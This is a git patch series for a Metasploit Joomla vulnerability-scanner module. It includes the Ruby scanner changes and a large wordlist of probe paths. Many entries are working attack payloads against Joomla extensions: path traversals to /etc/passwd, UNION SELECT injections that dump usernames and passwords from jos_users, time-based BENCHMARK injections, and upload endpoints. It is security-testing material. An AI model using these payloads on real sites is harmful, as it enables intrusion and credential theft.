+index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] +index.php?option=com_phocagallery&view=categories&Itemid= +index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_php&file=../../../../../../../../../../etc/passwd +index.php?option=com_php&file=../images/phplogo.jpg +index.php?option=com_php&file=../js/ie_pngfix.js +index.php?option=com_ponygallery&Itemid=[sqli] +index.php?option=com_products&catid=-1 +index.php?option=com_products&id=-1 +index.php?option=com_products&product_id=-1 +index.php?option=com_products&task=category&catid=-1 +index.php?option=com_properties&task=agentlisting&aid= +index.php?option=com_qcontacts&Itemid=1' +index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts +index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_restaurantguide&view=country&id='&Itemid=69 +index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' +index.php?option=com_seyret&view= +index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- +index.php?option=com_smartsite&controller= +index.php?option=com_spa&view=spa_product&cid= +index.php?option=com_spidercalendar +index.php?option=com_spidercalendar&date=1' +index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_staticxt&staticfile=test.php&id=1923 +index.php?option=com_szallasok&mode=8&id=25 (SQL) +index.php?option=com_tag&task=tag&tag= +index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- +index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users +index.php?option=com_ultimateportfolio&controller= +index.php?option=com_users&view=registration +index.php?option=com_virtuemart&page=account.index&keyword=[sqli] +index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_x-shop&action=artdetail&idd=' +index.php?option=com_x-shop&action=artdetail&idd='[SQLi] +index.php?option=com_xcomp&controller=../../[LFI]%00 +index.php?option=com_xvs&controller=../../[LFI]%00 +index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- +index.php?option=com_yjcontactus&view= +index.php?option=com_youtube&id_cate=4 +index.php?option=com_zina&view=zina&Itemid=9 +index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= +index.php?search=NoGe&option=com_esearch&searchId= +index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube +index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- +js/index.php?option=com_socialads&view=showad&Itemid=94 +libraries/joomla/utilities/compat/php50x.php +libraries/pcl/pcltar.php +libraries/phpmailer/phpmailer.php +libraries/phpxmlrpc/xmlrpcs.php +modules/mod_artuploader/upload.php"); +modules/mod_as_category.php +modules/mod_calendar.php +modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] +modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); +modules/mod_jfancy/script.php"); +modules/mod_ppc_simple_spotlight/elements/upload_file.php +modules/mod_ppc_simple_spotlight/img/ +modules/mod_pxt/ +modules/mod_quick_question.php +modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 +patch/makedown.php?arquivo=../../../../etc/passwd +plugins/content/efup_files/helper.php"); +plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> +plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ +plugins/editors/xstandard/attachmentlibrary.php +print.php?task=person&id=36 and 1=1 +templates/be2004-2/ +templates/ja_purity/ +wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- +web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 37bfc3d173..7b497d1846 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -2,7 +2,7 @@ # $Id: joomla_vulnscan.rb ## ## -#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples. +# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to Joomscan and various MSF modules for code examples. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,30 +21,30 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'Joomla Scanner', 'Description' => %q{ - This module scans a Joomla install for information and potential vulnerabilites. + This module scans a Joomla install for information, plugins and potential vulnerabilites. }, 'Author' => [ 'f8lerror' ], 'License' => MSF_LICENSE ) - register_options( + register_options( [ - OptString.new('PATH', [ true, "The path to the Joomla install", '/']), + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", - File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt") + File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt") ] ) ], self.class) end - def osfingerprint (response) + def osfingerprint(response) if(response.headers.has_key?('Server') ) if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) os = "Windows" elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) - os = "*Nix" + os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end @@ -52,8 +52,7 @@ class Metasploit3 < Msf::Auxiliary return os end - def fingerprint (response, app) - + def fingerprint(response, app) if(response.body =~ /(.+)<\/version\/?>/i) v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" @@ -87,58 +86,65 @@ class Metasploit3 < Msf::Auxiliary return out end - def run_host (ip) - tpath = datastore['PATH'] - if tpath[-1,1] != '/' + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' tpath += '/' - end - apps = [ 'language/en-GB/en-GB.xml', + end + apps = [ 'languaage/en-GB/en-GB.xml', 'templates/system/css/system.css', 'media/system/js/mootools-more.js', 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] - iapps = ['robots.txt','administrator/index.php','/admin/','index.php/using-joomla/extensions/components/users-component/registration-form', + iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - print_status("Checking Host: #{ip} for version information") + apps.each do |app| - break if check_app(tpath,app,ip) + app_status = check_app(tpath, app, ip) + return if app_status == :abort + break if app_status end - print_status("Scanning #{ip} for interesting pages") + vprint_status("#{peer} - Checking host for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - print_status("Scanning #{ip} for plugins") + vprint_status("#{peer} - Checking host for interesting plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', }, 5) - return if not bres or not bres.body or not bres.code + return false if not bres or not bres.body or not bres.code bres.body.gsub!(/[\r|\n]/, ' ') File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| papp = bapp.chomp plugin_search(tpath,papp,ip,bres) end end - end - def check_app (tpath, app, ip) + def check_app(tpath, app, ip) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << app, + 'uri' => "#{tpath}" << app, 'method' => 'GET', }, 5) - return if not res or not res.body or not res.code + return :abort if res.nil? + return false if not res or not res.body or not res.code + vprint_status("#{peer} - Checking host for version information") res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) - if (res.code.to_i == 200) + if (res.code == 200) out = fingerprint(res,app) return if not out if(out =~ /Unknown Joomla/) - print_error("Unable to identify Joomla Version with this file #{app}") + print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") return false else - print_good("Joomla Version:#{out} from: #{app} ") - print_good("OS: #{os}") + print_good("#{peer} - Joomla Version:#{out} from: #{app} ") + print_good("#{peer} - OS: #{os}") report_note( :host => ip, :port => datastore['RPORT'], @@ -146,44 +152,50 @@ class Metasploit3 < Msf::Auxiliary :ntype => 'Joomla Version', :data => out ) - return true + return :next_app end - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} denied access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end - def scan_pages (tpath, iapp, ip) + def scan_pages(tpath, iapp, ip) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << iapp, + 'uri' => "#{tpath}" << iapp, 'method' => 'GET', }, 5) - return if not res or not res.body or not res.code + return false if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') - if (res.code.to_i == 200) + if (res.code == 200) if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) - sout = "Administrator Login Page" + sout = "**Administrator Login Page" elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) - sout = "Registration Page" + sout = "**Registration Page" else - sout = iapp + sout = iapp end return if not sout if(sout == iapp) - print_good("#{iapp}") - elsif print_good("#{sout}: #{iapp} ") + print_good("#{peer} - Page: #{tpath}#{iapp}") + elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}") report_note( :host => ip, :port => datastore['RPORT'], @@ -192,58 +204,64 @@ class Metasploit3 < Msf::Auxiliary :data => sout ) end - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} denied access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end - def plugin_search (tpath, papp, ip, bres) + def plugin_search(tpath, papp, ip, bres) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << papp, + 'uri' => "#{tpath}" << papp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') osize = bres.body.size nsize = res.body.size - if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("Found Plugin: #{papp} ") + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") if (papp =~/passwd/ and res.body !~/root/) - print_error("Passwd not found") + vprint_error("#{peer} - Vulnerability: LFI not found") elsif(papp =~/passwd/ and res.body =~/root/) - print_good("Passwd file found in response") + print_good("#{peer} - Vulnerability: Potential LFI") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("Possible SQL Injection") + print_good("#{peer} - Vulnerability: Potential SQL Injection") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - print_error("Unable to identify SQL injection") + vprint_error("#{peer} - Vulnerability: Unable to identify SQL injection") elsif(papp =~/>alert/ and res.body !~/>alert/) - print_error("No XSS") + vprint_error("#{peer} - Vulnerability: No XSS") elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("Possible XSS") + print_good("#{peer} - Vulnerability: Potential XSS") elsif(res.body =~/SQL syntax/ ) - print_good("Possible SQL Injection") + print_good("#{peer} - Vulnerability: Potential SQL Injection") elsif(papp =~/com_/) vars = papp.split('_') pages = vars[1].gsub('/','') res1 = send_request_cgi({ - 'uri' => "#{datastore['PATH']}"<<"index.php?option=com_#{pages}", + 'uri' => "#{tpath}"<<"index.php?option=com_#{pages}", 'method' => 'GET', }, 5) - if (res1.code.to_i == 200) - print_good("Found Page: index.php?option=com_#{pages}") + if (res1.code == 200) + print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") else - print_error("#{datastore['PATH']}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") + vprint_error("#{peer} - Page: #{tpath}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") end end report_note( @@ -253,21 +271,27 @@ class Metasploit3 < Msf::Auxiliary :ntype => 'Plugin Found', :data => papp ) - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} ip access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end From bf2b01f8ef53c6d185b91b071a351943e4171e92 Mon Sep 17 00:00:00 2001 From: f8lerror Date: Thu, 24 Jan 2013 09:30:04 -0500 Subject: [PATCH 4/7] Delete a file and strip space --- data/wordlists/pcheck.txt | 627 ------------------ .../auxiliary/scanner/http/joomla_vulnscan.rb | 2 +- 2 files changed, 1 insertion(+), 628 deletions(-) delete mode 100755 data/wordlists/pcheck.txt diff --git a/data/wordlists/pcheck.txt b/data/wordlists/pcheck.txt deleted file mode 100755 index b65dd2a422..0000000000 --- a/data/wordlists/pcheck.txt +++ /dev/null @@ -1,627 +0,0 @@ -&controller=../../../../../../../../../../../../[LFI]%00 -?1.5.10-x -?1.5.11-x-http_ref -?1.5.11-x-php-s3lf -?1.5.3-path-disclose -?1.5.3-spam -?1.5.8-x -?1.5.9-x -?j1012-fixate-session -?option=com_mysms&Itemid=0&task=phonebook -Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png -admin/ -administrator/ -administrator/components/ -administrator/components/com_a6mambocredits/ -administrator/components/com_a6mambohelpdesk/ -administrator/components/com_admin/admin.admin.html.php -administrator/components/com_astatspro/refer.php -administrator/components/com_bayesiannaivefilter/ -administrator/components/com_chronocontact/excelwriter/PPS/File.php -administrator/components/com_colophon/ -administrator/components/com_colorlab/ -administrator/components/com_comprofiler/ -administrator/components/com_comprofiler/plugin.class.php -administrator/components/com_cropimage/admin.cropcanvas.php -administrator/components/com_extplorer/ -administrator/components/com_feederator/includes/tmsp/add_tmsp.php -administrator/components/com_googlebase/ -administrator/components/com_installer -administrator/components/com_jcs/ -administrator/components/com_jim/ -administrator/components/com_jjgallery/ -administrator/components/com_joom12pic/ -administrator/components/com_joomla-visites/ -administrator/components/com_joomla_flash_uploader/ -administrator/components/com_joomlaflashfun/ -administrator/components/com_joomlaradiov5/ -administrator/components/com_jpack/ -administrator/components/com_jreactions/ -administrator/components/com_juser/ -administrator/components/com_admin/ -administrator/components/com_kochsuite / -administrator/components/com_linkdirectory/ -administrator/components/com_livechat/getSavedChatRooms.php -administrator/components/com_livechat/xmlhttp.php -administrator/components/com_lurm_constructor/admin.lurm_constructor.php -administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); -administrator/components/com_mambelfish/ -administrator/components/com_mgm/ -administrator/components/com_mmp/help.mmp.php -administrator/components/com_mosmedia/ -administrator/components/com_multibanners/extadminmenus.class.php -administrator/components/com_panoramic/ -administrator/components/com_peoplebook/param.peoplebook.php -administrator/components/com_phpshop/toolbar.phpshop.html.php -administrator/components/com_remository/admin.remository.php -administrator/components/com_serverstat/install.serverstat.php -administrator/components/com_simpleswfupload/uploadhandler.php"); -administrator/components/com_swmenupro/ -administrator/components/com_treeg/ -administrator/components/com_uhp/ -administrator/components/com_uhp2/ -administrator/components/com_webring/ -administrator/components/com_wmtgallery/ -administrator/components/com_wmtportfolio/ -administrator/components/com_x-shop/ -administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ -administrator/index.php?option=com_searchlog&act=log -ajaxim/ -akocomments.php -cart?Itemid=[SQLi] -component/com__brightweblinks/ -component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 -component/osproperty/?task=agent_register -component/quran/index.php?option=com_quran&action=viewayat&surano= -components/com_ clickheat/ -components/com_5starhotels/ -components/com_Jambook/jambook.php -components/com_a6mambocredits/ -components/com_a6mambohelpdesk/ -components/com_ab_gallery/ -components/com_acajoom/ -components/com_acctexp/ -components/com_aclassf/ -components/com_activities/ -components/com_actualite/ -components/com_admin/admin.admin.html.php -components/com_advancedpoll/ -components/com_agora/ -components/com_agoragroup/ -components/com_ajaxchat/ -components/com_akobook/ -components/com_akocomment/ -components/com_akogallery -components/com_alberghi/ -components/com_allhotels/ -components/com_alphacontent/ -components/com_altas/ -components/com_amocourse/ -components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php -components/com_articles/ -components/com_artist/ -components/com_artlinks/ -components/com_asortyment/ -components/com_astatspro/ -components/com_awesom/ -components/com_babackup/ -components/com_banners/ -components/com_bayesiannaivefilter/ -components/com_be_it_easypartner/ -components/com_beamospetition/ -components/com_biblestudy/ -components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -components/com_blog/ -components/com_bookflip/ -components/com_bookjoomlas/ -components/com_booklibrary/ -components/com_books/ -components/com_bsadv/ -components/com_bsq_sitestats/ -components/com_bsq_sitestats/external/rssfeed.php -components/com_bsqsitestats/ -components/com_calendar/ -components/com_camelcitydb2/ -components/com_candle/ -components/com_casino_blackjack/ -components/com_casino_videopoker/ -components/com_casinobase/ -components/com_catalogproduction/ -components/com_catalogshop/ -components/com_category/ -components/com_cgtestimonial/video.php?url="> -components/com_chronocontact/excelwriter/PPS/File.php -components/com_cinema/ -components/com_clasifier/ -components/com_classifieds/ -components/com_clickheat/ -components/com_cloner/ -components/com_cmimarketplace/ -components/com_cms/ -components/com_colophon/ -components/com_colorlab/ -components/com_competitions/ -components/com_comprofiler/ -components/com_comprofiler/plugin.class.php -components/com_contactinfo/ -components/com_content/ -components/com_cpg/cpg.php -components/com_cropimage/admin.cropcanvas.php -components/com_custompages/ -components/com_cx/ -components/com_d3000/ -components/com_dadamail/ -components/com_dailymessage/ -components/com_datsogallery/ -components/com_dbquery/ -components/com_detail/ -components/com_digistore/ -components/com_directory/ -components/com_djiceshoutbox/ -components/com_doc/ -components/com_downloads/ -components/com_ds-syndicate/ -components/com_dtregister/ -components/com_dv/externals/phpupload/upload.php"); -components/com_easybook/ -components/com_emcomposer/ -components/com_equotes/ -components/com_estateagent/ -components/com_eventing/ -components/com_eventlist/ -components/com_events/ -components/com_ewriting/ -components/com_expose/uploadimg.php -components/com_expshop/ -components/com_extcalendar/ -components/com_extcalendar/cal_popup.php?extmode=view&extid= -components/com_extcalendar/extcalendar.php -components/com_extended_registration/registration_detailed.inc.php -components/com_extplorer/ -components/com_ezine/ -components/com_ezstore/ -components/com_facileforms/ -components/com_fantasytournament/ -components/com_faq/ -components/com_feederator/includes/tmsp/add_tmsp.php -components/com_filebase/ -components/com_filiale/ -components/com_flashfun/ -components/com_flashmagazinedeluxe/ -components/com_flippingbook/ -components/com_flyspray/startdown.php -components/com_fm/fm.install.php -components/com_foevpartners/ -components/com_football/ -components/com_formtool/ -components/com_forum/ -components/com_fq/ -components/com_fundraiser/ -components/com_galeria/ -components/com_galleria/galleria.html.php -components/com_gallery/ -components/com_game/ -components/com_gameq/ -components/com_garyscookbook/ -components/com_genealogy/ -components/com_geoboerse/ -components/com_gigcal/ -components/com_gmaps/ -components/com_googlebase/ -components/com_gsticketsystem/ -components/com_guide/ -components/com_hashcash/server.php -components/com_hbssearch/ -components/com_hello_world/ -components/com_hotproperties/ -components/com_hotproperty/ -components/com_hotspots/ -components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php -components/com_hwdvideoshare/ -components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); -components/com_ice/ -components/com_idoblog/ -components/com_idvnews/ -components/com_ignitegallery/ -components/com_ijoomla_archive/ -components/com_ijoomla_rss/ -components/com_inter/ -components/com_ionfiles/ -components/com_is/ -components/com_ixxocart/ -components/com_jabode/ -components/com_jashowcase/ -components/com_jb2/ -components/com_jce/ -components/com_jcs/ -components/com_jd-wiki/ -components/com_jd-wp/ -components/com_jim/ -components/com_jjgallery/ -components/com_jmovies/ -components/com_jobline/ -components/com_jombib/ -components/com_joobb/ -components/com_jooget/ -components/com_joom12pic/ -components/com_joomla-visites/ -components/com_joomla_flash_uploader/ -components/com_joomlaboard/ -components/com_joomladate/ -components/com_joomlaflashfun/ -components/com_joomlalib/ -components/com_joomlaradiov5/ -components/com_joomlavvz/ -components/com_joomlaxplorer/ -components/com_joomloads/ -components/com_joomradio/ -components/com_joomtracker/ -components/com_joovideo/ -components/com_jotloader/ -components/com_journal/ -components/com_jpack/ -components/com_jpad/ -components/com_jreactions/ -components/com_jreviews/scripts/xajax.inc.php -components/com_jumi/ -components/com_juser/ -components/com_jvideo/ -components/com_k2/ -components/com_kbase/ -components/com_knowledgebase/fckeditor/fckeditor.js -components/com_kochsuite / -components/com_kunena/ -components/com_letterman/ -components/com_lexikon/ -components/com_linkdirectory/ -components/com_listoffreeads/ -components/com_livechat/getSavedChatRooms.php -components/com_livechat/xmlhttp.php -components/com_liveticker/ -components/com_lm/ -components/com_lmo/ -components/com_loudmounth/includes/abbc/abbc.class.php -components/com_loudmouth/ -components/com_lowcosthotels/ -components/com_lurm_constructor/admin.lurm_constructor.php -components/com_mad4joomla/ -components/com_madeira/img.php -components/com_maianmusic/ -components/com_mailarchive/ -components/com_mailto/ -components/com_mambatstaff/mambatstaff.php -components/com_mambelfish/ -components/com_mambospgm/ -components/com_mambowiki/MamboLogin.php -components/com_marketplace/ -components/com_mcquiz/ -components/com_mdigg/ -components/com_media_library/ -components/com_mediaslide/ -components/com_mezun/ -components/com_mgm/ -components/com_minibb/ -components/com_misterestate/ -components/com_mmp/help.mmp.php -components/com_model/ -components/com_moodle/moodle.php -components/com_moofaq/ -components/com_mosmedia/ -components/com_mospray/scripts/admin.php -components/com_mosres/ -components/com_most/ -components/com_mp3_allopass/ -components/com_mtree/ -components/com_mtree/img/listings/o/{id}.php -components/com_multibanners/extadminmenus.class.php -components/com_myalbum/ -components/com_mycontent/ -components/com_mydyngallery/ -components/com_mygallery/ -components/com_n-forms/ -components/com_na_content/ -components/com_na_mydocs/ -components/com_na_newsdescription/ -components/com_na_qforms/ -components/com_neogallery/ -components/com_neorecruit/ -components/com_neoreferences/ -components/com_netinvoice/ -components/com_news/ -components/com_news_portal/ -components/com_newsflash/ -components/com_nfn_addressbook/ -components/com_nicetalk/ -components/com_noticias/ -components/com_omnirealestate/ -components/com_omphotogallery/ -components/com_ongumatimesheet20/ -components/com_onlineflashquiz/ -components/com_ownbiblio/ -components/com_panoramic/ -components/com_paxgallery/ -components/com_paxxgallery/ -components/com_pcchess/ -components/com_pcchess/include.pcchess.php -components/com_pccookbook/ -components/com_pccookbook/pccookbook.php -components/com_peoplebook/param.peoplebook.php -components/com_performs/ -components/com_philaform/ -components/com_phocadocumentation/ -components/com_php/ -components/com_phpshop/toolbar.phpshop.html.php -components/com_pinboard/ -components/com_pms/ -components/com_poll/ -components/com_pollxt/ -components/com_ponygallery/ -components/com_portafolio/ -components/com_portfol/ -components/com_prayercenter/ -components/com_pro_desk/ -components/com_prod/ -components/com_productshowcase/ -components/com_profiler/ -components/com_projectfork/ -components/com_propertylab/ -components/com_puarcade/ -components/com_publication/ -components/com_quiz/ -components/com_rapidrecipe/ -components/com_rdautos/ -components/com_realestatemanager/ -components/com_recly/ -components/com_referenzen/ -components/com_rekry/ -components/com_remository/admin.remository.php -components/com_remository_files/file_image_14/1276100016shell.php -components/com_reporter/processor/reporter.sql.php -components/com_resman/ -components/com_restaurante/ -components/com_ricette/ -components/com_rsfiles/ -components/com_rsgallery/ -components/com_rsgallery2/ -components/com_rss/ -components/com_rssreader/ -components/com_rssxt/ -components/com_rwcards/ -components/com_school/ -components/com_search/ -components/com_sebercart/getPic.php?p=[LFD]%00 -components/com_securityimages/ -components/com_sef/ -components/com_seminar/ -components/com_serverstat/install.serverstat.php -components/com_sg/ -components/com_simple_review/ -components/com_simpleboard/ -components/com_simplefaq/ -components/com_simpleshop/ -components/com_sitemap/sitemap.xml.php -components/com_slideshow/ -components/com_smf/ -components/com_smf/smf.php -components/com_swmenupro/ -components/com_team/ -components/com_tech_article/ -components/com_thopper/ -components/com_thyme/ -components/com_tickets/ -components/com_tophotelmodule/ -components/com_tour_toto/ -components/com_trade/ -components/com_uhp/ -components/com_uhp2/ -components/com_user/controller.php -components/com_users/ -components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php -components/com_vehiclemanager/ -components/com_versioning / -components/com_videodb/core/videodb.class.xml.php -components/com_virtuemart/ -components/com_volunteer/ -components/com_vr/ -components/com_waticketsystem/ -components/com_webhosting/ -components/com_weblinks/ -components/com_webring/ -components/com_wmtgallery/ -components/com_wmtportfolio/ -components/com_x-shop/ -components/com_xevidmegahd/ -components/com_xewebtv/ -components/com_xfaq/ -components/com_xgallery/helpers/img.php?file= -components/com_xsstream-dm/ -components/com_ynews/ -components/com_yvcomment/ -components/com_zoom/classes/ -components/mod_letterman/ -components/remository/ -eXtplorer/ -easyblog/entry/uncategorized -extplorer/ -http://{target}/components/com_mtree/img/listings/o/{id}.php where {id} -includes/joomla.php -index.php/404' -index.php/?option=com_question&catID=21' and+1=0 union all -index.php/image-gallery/">/25-koala -index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 -index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view -index.php?option=com_aardvertiser&cat_name=conf&task=<= -index.php?option=com_aardvertiser&task= -index.php?option=com_abc&view=abc&letter=AS§ionid=' -index.php?option=com_advert&id=36' 